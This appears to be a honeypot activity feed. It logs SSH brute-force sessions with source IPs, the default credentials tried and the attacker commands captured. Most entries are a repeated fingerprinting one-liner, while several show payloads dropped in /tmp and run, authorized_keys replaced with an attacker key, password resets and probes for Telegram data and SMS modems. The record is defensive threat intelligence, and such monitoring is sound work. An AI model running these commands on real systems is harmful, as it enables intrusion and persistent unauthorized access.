"LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 roo_root_5 (170.64.179.36) — Sydney, Australia · 3 sessions · 12 cmds

2026-03-15 01:49 EDT · as admin/123456, admin/admin123, admin/password

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 scone_root_11 (188.166.152.204) — Slough, United Kingdom · 3 sessions · 12 cmds

2026-03-15 01:22 EDT · as admin/123456, admin/admin123, admin/password

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 cipher_pi_2 (116.105.173.160) — Da Nang, Vietnam · 2 sessions · 3 cmds

2026-03-15 01:01 EDT · as pi/raspberry

make executable → execute payload → execute from /tmp

$ cd /tmp && chmod +x 9xAfYPZA && bash -c ./9xAfYPZA

↳ make executable

$ ./9xAfYPZA

↳ execute payload

$ scp -t /tmp/9xAfYPZA

↳ execute from /tmp

🎭 bike_root_10 (167.71.7.85) — Amsterdam, Netherlands · 6 sessions · 24 cmds

2026-03-15 00:29 EDT · as admin/admin, root/1234, root/123456

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 reef_root_3 (209.38.80.143) — Sydney, Australia · 3 sessions · 12 cmds

2026-03-15 00:36 EDT · as root/admin, root/password, root/root

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 strudel_pi_2 (139.59.144.155) — Frankfurt am Main, Germany · 1 session · 4 cmds

2026-03-14 23:50 EDT · as pi/raspberry

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 dutch_root_9 (167.172.42.141) — Amsterdam, Netherlands · 8 sessions · 32 cmds

2026-03-14 23:14 EDT · as root/1234, root/123456, root/12345678

export → uname → cat (repeated export 8x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×8

$ uname -s -v -n -m 2 > /dev/null ×8

$ uname -m 2 > /dev/null ×8

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×8

🎭 scone_root_12 (138.68.145.55) — Slough, United Kingdom · 11 sessions · 44 cmds

2026-03-14 23:00 EDT · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 11x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×11

$ uname -s -v -n -m 2 > /dev/null ×11

$ uname -m 2 > /dev/null ×11

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×11

🎭 sensei_root_2 (47.74.45.204) — Tokyo, Japan · 5 sessions · 5 cmds

2026-03-14 23:11 EDT · as oracle/!QAZ@WSX, oracle/oracle, pi/raspberry

Ran uname 5x across 5 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×5

🎭 k-pop_root_6 (14.53.61.63) — Uijeongbu-si, South Korea · 1 session · 9 cmds

2026-03-07 14:10 EST · as root/admin

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 spice_root_8 (165.22.218.212) — Bengaluru, India · 4 sessions · 16 cmds

2026-03-07 12:04 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 shadow_root (213.250.148.25) — Istanbul, Turkey · 21 sessions · 21 cmds

2026-03-07 09:15 EST · as admin/123456, admin/admin, admin/admin123

Ran uname 21x across 21 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×21

🎭 outback_root_4 (170.64.155.134) — Sydney, Australia · 12 sessions · 48 cmds

2026-03-07 08:44 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 12x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×12

$ uname -s -v -n -m 2 > /dev/null ×12

$ uname -m 2 > /dev/null ×12

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×12

🎭 star_root_16 (47.85.176.53) — Charlottesville, United States · 3 sessions · 12 cmds

2026-03-07 08:06 EST · as root/12345678, root/admin, root/qwerty

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 lotus_root_13 (139.59.1.253) — Bengaluru, India · 8 sessions · 32 cmds

2026-03-07 07:33 EST · as admin/123456, admin/admin, root/1234

export → uname → cat (repeated export 8x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×8

$ uname -s -v -n -m 2 > /dev/null ×8

$ uname -m 2 > /dev/null ×8

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×8

🎭 bistro_root_5 (196.247.232.100) — Paris, France · 3 sessions · 3 cmds

2026-03-07 07:47 EST · as admin/admin, root/admin, root/toor

echo (repeated echo 3x)

$ echo OKTEST123 ×3

🎭 spice_root_9 (139.59.41.236) — Bengaluru, India · 5 sessions · 20 cmds

2026-03-07 07:34 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 kiwi_root_4 (170.64.209.162) — Sydney, Australia · 3 sessions · 12 cmds

2026-03-07 06:02 EST · as root/12345678, root/admin, root/toor

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 ghost_pi (175.110.235.108) — Jeddah, Saudi Arabia · 2 sessions · 3 cmds

2026-03-07 03:25 EST · as pi/raspberry

make executable → execute payload → execute from /tmp

$ cd /tmp && chmod +x o6yi5gGp && bash -c ./o6yi5gGp

↳ make executable

$ ./o6yi5gGp

↳ execute payload

$ scp -t /tmp/o6yi5gGp

↳ execute from /tmp

🎭 ghost_root_76 (152.42.212.36) — Singapore, Singapore · 1 session · 20 cmds

2026-03-06 23:52 EST · as postgres/postgres

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "postgres\nRPGrDKJNnjYi\nRPGrDKJNnjYi"|passwd|bash

$ Enter new UNIX password:

$ echo "postgres\nRPGrDKJNnjYi\nRPGrDKJNnjYi\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 wok_db_2 (36.99.46.24) — Guancheng, China · 1 session · 20 cmds

2026-03-06 23:37 EST · as postgres/postgres

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "postgres\nbyklremOSpWe\nbyklremOSpWe"|passwd|bash

$ Enter new UNIX password:

$ echo "postgres\nbyklremOSpWe\nbyklremOSpWe\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 tea_root_10 (188.166.151.247) — Slough, United Kingdom · 1 session · 4 cmds

2026-03-06 23:08 EST · as root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo 